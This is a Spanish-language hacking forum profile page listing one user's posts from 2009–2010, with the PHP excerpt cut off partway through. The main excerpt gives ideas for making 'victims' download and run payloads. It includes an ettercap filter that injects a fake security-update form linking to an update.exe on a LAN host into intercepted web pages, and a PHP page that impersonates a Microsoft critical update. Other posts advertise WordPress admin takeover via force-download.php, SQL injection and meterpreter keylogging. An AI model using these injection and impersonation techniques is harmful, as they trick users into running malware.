![[x]](http://www.diosdelared.com/images/add.ico)
maztor
virtux
murder
komtec1
pandemic
mandeville
![[x]](http://www.diosdelared.com/redirect.php?go=http://i39.tinypic.com/33m4u2o.png "darkspark")
Nick: darkspark
Rango: 
País: 
Visitas: 7698
Votos: 32
En Blogrolls: 13
Status: 
PM
![[x]](http://www.diosdelared.com/images/tecnico.jpg "Artículo técnico"){kind=small}
word_press+force-download.php=ownedPublicado el 16/02/2010 12:02:00 en Videos Hacking. Total de votos: 5 Votar
bueno pues aquí le dejo este vídeo de como aprovechar el archivo force-download.php ( o similares ) para obtener acceso al panel de administración, en este caso de word press. 2 ideas de como lograr que ejecuten nuestros payloadsPublicado el 26/01/2010 12:01:00 en Hack Avanzado. Total de votos: 1 Votar
Primero que nada, este no es un videotutorial, la intencion es solo de dar ideas de como se puede lograr que las "victimas" descargen y ejecuten nuestros payloads.
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Be-Owned");
}
}
if (ip.proto == TCP && tcp.src == 80) {
if (search(DATA.data, "<title>")) {
replace("</title>", "</title><form
action="http://192.168.1.67/update.exe" method="link"><center><img src="http://192.168.1.67/alert.jpg"><br><br><INPUT TYPE=submit value="Descargar actualizacion"></form><html><body><h1><font color=red>Alerta de seguridad</font></h1></body></html>");
replace("<head>", "<head> <title> Software Upgrade </title> <body><font color=black size=10> Please download the last Active X security upgrade to Continue </font><body text="#ffffff" link="#ffff33" alink="#ffffcc" alink="ffff00"></center> </body> </head>" ");
msg("Filtro activado.\n");
msg("html inyectado exitosamente!!");
}}
<?php
$navegador = getenv("HTTP_USER_AGENT");
if (preg_match("/MSIE/i", "$navegador"))
{
echo "<html>
<head>
<META http-equiv='Content-Type' content='text/html; charset=utf-8'>
<style>
body
{
background-image:url('ie-8.jpg');
background-repeat: no-repeat;
background-position:center;
}
</style>
</head>
<body><h2 align='center'><font color='red'>Actualizacion Critica De Seguridad</font></h2><br>
<h3><pre><center><a href='http://www.microsoft.com/spain/technet/security/bulletin/ms10-002.mspx'>MS10-002:</a> trata las vulnerabilidades en Internet Explorer (KB 978207)
Los profesionales de TI y los administradores de sistemas deben consultar <a href='http://www.microsoft.com/spain/technet/security/bulletin/current.mspx'>TechNet</a><br>de Microsoft para obtener información detallada acerca de estas actualizaciones.
</pre></h3>
<h2 align='center'>... Instalar Back | Track 4 Final en una USB con cambios persistentesPublicado el 19/01/2010 12:01:00 en Linux. Total de votos: 2 Votar
Bueno como el titulo lo indica, este tutorial muestra como instalar BT4 final en una usb con cambios persistentes (para no perder la configuracion,personalisacion,programas instalados,etc). video tutorial inyeccion SQL basicaPublicado el 02/01/2010 12:01:00 en Hacking Web. Total de votos: 1 Votar
bueno pues como el titulo lo dice, este es un pequeño video tutorial de injeccion SQL, espero les guste =) sniffing keyboards in LAN with meterpreterPublicado el 30/11/2009 12:11:00 en Videos Hacking. Total de votos: 4 Votar
aqui les dejo un video en el que muestro como sniffear teclados en una lan utilizando metasploit